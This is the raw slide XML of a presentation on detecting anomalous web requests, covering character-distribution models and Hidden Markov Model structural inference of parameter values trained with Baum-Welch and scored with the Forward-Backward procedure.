                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>character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frequency</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> in i-th </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>parameter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value</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>) = </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>occurences</a:t>
                </a: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𝑐h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l-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>character</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> in i-th </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>parameter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value</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>/ </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>length</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t>i-th </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1"/>
                  <a:t>parameter</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>value</a:t>
                </a:r>
                <a:endParaRPr lang="pl-PL" dirty="0" smtClean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 r="-3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5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 smtClean="0"/>
              <a:t>Character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Distribution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4386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20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Character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> Distribution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8773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92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Character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>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l-PL" dirty="0" smtClean="0"/>
                  <a:t>Testing</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0"/>
                  <a:t>f</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>or </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>every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character</a:t>
                </a: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/>
                          </a:rPr>
                          <m:t>𝑐h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l-PL" dirty="0" smtClean="0"/>
                  <a:t>:</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                </a:br>
                <a:endParaRPr lang="pl-PL" dirty="0" smtClean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90" y="2852937"/>
            <a:ext cx="5283154" cy="1440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1144189" y="4653136"/>
                <a:ext cx="3539495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/>
                            </a:rPr>
                            <m:t>𝑐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̃"/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l-PL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  <m:sSub>
                                      <m:sSubPr>
                                        <m:ctrlPr>
                                          <a:rPr lang="pl-PL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l-PL" b="0" i="1" smtClean="0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pl-PL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pl-PL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𝑖𝑓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l-PL" i="1">
                                        <a:latin typeface="Cambria Math"/>
                                      </a:rPr>
                                      <m:t>𝑐</m:t>
                                    </m:r>
                                    <m:sSub>
                                      <m:sSubPr>
                                        <m:ctrlPr>
                                          <a:rPr lang="pl-PL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l-PL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pl-PL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b="0" i="1" smtClean="0">
                                    <a:latin typeface="Cambria Math"/>
                                  </a:rPr>
                                  <m:t>&lt;1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1 </m:t>
                                </m:r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𝑓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l-PL" i="1">
                                        <a:latin typeface="Cambria Math"/>
                                      </a:rPr>
                                      <m:t>𝑐</m:t>
                                    </m:r>
                                    <m:sSub>
                                      <m:sSubPr>
                                        <m:ctrlPr>
                                          <a:rPr lang="pl-PL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l-PL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pl-PL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b="0" i="1" smtClean="0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189" y="4653136"/>
                <a:ext cx="3539495" cy="7101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/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1146125" y="5517232"/>
                <a:ext cx="2202718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/>
                            </a:rPr>
                            <m:t>𝑐h</m:t>
                          </m:r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l-PL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pl-PL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(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𝑐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0" name="pole tekstow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125" y="5517232"/>
                <a:ext cx="2202718" cy="7645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3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Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>tructural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Inference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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Structural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>inference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>help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simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>described</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>earlier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not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>sufficient</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>In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approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>values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modelled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>regular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endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Markov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Model to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>describe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regular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05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Ergodic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> HMM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969414" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15667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Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>structural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>inference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l-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>Definitions</a:t>
                </a:r>
                <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="30000" dirty="0" smtClean="0"/>
                  <a:t>(k)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> = O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="30000" dirty="0" smtClean="0"/>
                  <a:t>(k)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O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="30000" dirty="0" smtClean="0"/>
                  <a:t>(k)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>2</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>…O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="30000" dirty="0" smtClean="0"/>
                  <a:t>(k)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>N</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> – k-th </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>observation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sequence</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
                  <a:t>λ</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> = (A,B,</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
                  <a:t>π</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>) – HMM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𝑃</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>(</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑂</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>|</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="el-GR" dirty="0"/>
                      <m:t>λ</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="pl-PL" b="0" i="0" dirty="0" smtClean="0"/>
                      <m:t>)=</m:t>
                    </m:r>
                    <m:nary>
                      <m:naryPr>
                        <m:chr m:val="∏"/>
                        <m:ctrlPr>
                          <a:rPr lang="pl-PL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b="0" i="1" dirty="0" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑘</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL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l-PL" b="0" i="1" dirty="0" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝐾</m:t>
                        </m:r>
                      </m:sup>
                      <m:e>
                        <m:r>
                          <a:rPr lang="pl-PL" b="0" i="1" dirty="0" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑃</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL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pl-PL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l-PL" i="1" dirty="0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d>
                              <m:dPr>
                                <m:ctrlPr>
                                  <a:rPr lang="pl-PL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l-PL" b="0" i="1" dirty="0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r>
                          <a:rPr lang="pl-PL" b="0" i="1" dirty="0" smtClean="0">
                            <a:latin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l-GR" dirty="0"/>
                          <m:t>λ</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL" b="0" i="1" dirty="0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pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>Learning - </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>adjusting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> the model </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>parameters</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
                  <a:t>λ</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> to </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>maximize</a:t>
                </a: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</a:rPr>
                      <m:t>𝑃</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>(</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑂</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>|</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="el-GR" dirty="0"/>
                      <m:t>λ</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="pl-PL" b="0" i="0" dirty="0" smtClean="0"/>
                      <m:t>)</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="pl-PL" b="0" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>Baum-Welch </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>algorithm</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> (</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>finds</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> the </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>local</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> minima of the </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>likelihood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function</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>Generating</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> k </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>HMMs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> with a </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>states</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> from 2 to </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>sqrt</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>(N), </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>where</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> N </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>is</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> the </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>number</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>characters</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> in the </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>longest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observation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sequence</a:t>
                </a:r>
                <a:endParaRPr lang="pl-PL" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>A, B  and </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
                  <a:t>π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matrices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are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randomly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initialised</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>The HMM with max(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</a:rPr>
                      <m:t>𝑃</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>(</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝑂</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="pl-PL" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>|</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="el-GR" dirty="0"/>
                      <m:t>λ</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="pl-PL" b="0" i="0" dirty="0" smtClean="0"/>
                      <m:t>) ) </m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="pl-PL" b="0" i="0" dirty="0" smtClean="0"/>
                      <m:t>are</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="pl-PL" b="0" i="0" dirty="0" smtClean="0"/>
                      <m:t> </m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="pl-PL" b="0" i="0" dirty="0" smtClean="0"/>
                      <m:t>chosen</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> 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3055" r="-1778" b="-23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Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Structural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Inference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76872"/>
                <a:ext cx="8229600" cy="4176464"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>Testing</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="-25000" dirty="0" err="1" smtClean="0"/>
                  <a:t>obs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> = O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O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>2</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>…O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="-25000" dirty="0" smtClean="0"/>
                  <a:t>N</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>observation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sequence</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> (from </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>incoming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requests</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>Calculate</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> P(</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>O</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" baseline="-25000" dirty="0" err="1" smtClean="0"/>
                  <a:t>obs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>|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λ</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>) </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>using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Forward-Backward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Procedure</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> (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𝑃</m:t>
                    </m:r>
                    <m:d>
                      <m:dPr>
                        <m:endChr m:val="|"/>
                        <m:ctrlPr>
                          <a:rPr lang="pl-PL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/>
                              </a:rPr>
                              <m:t>𝑜𝑏𝑠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pl-PL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dirty="0"/>
                      <m:t>λ</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="pl-PL" b="0" i="0" dirty="0" smtClean="0"/>
                      <m:t>) = </m:t>
                    </m:r>
                    <m:nary>
                      <m:naryPr>
                        <m:chr m:val="∑"/>
                        <m:ctrlPr>
                          <a:rPr lang="pl-PL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b="0" i="1" dirty="0" smtClean="0">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝑖</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="pl-PL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l-PL" b="0" i="1" dirty="0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pl-PL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l-PL" b="0" i="1" dirty="0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pl-PL" b="0" i="1" dirty="0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pl-PL" b="0" i="1" dirty="0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l-PL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pl-PL" b="0" i="1" dirty="0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pl-PL" dirty="0" smtClean="0"/>
                  <a:t>)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76872"/>
                <a:ext cx="8229600" cy="4176464"/>
              </a:xfrm>
              <a:blipFill rotWithShape="1">
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-1630" t="-189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6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Anomaly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>etection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l-PL" dirty="0" smtClean="0"/>
                  <a:t>After </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>defining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particular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models</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t>, we </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>can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determine</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> the </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
                  <a:t>anomaly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score</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
                  <a:t> for </a:t>
                </a:r>
                <a:r>
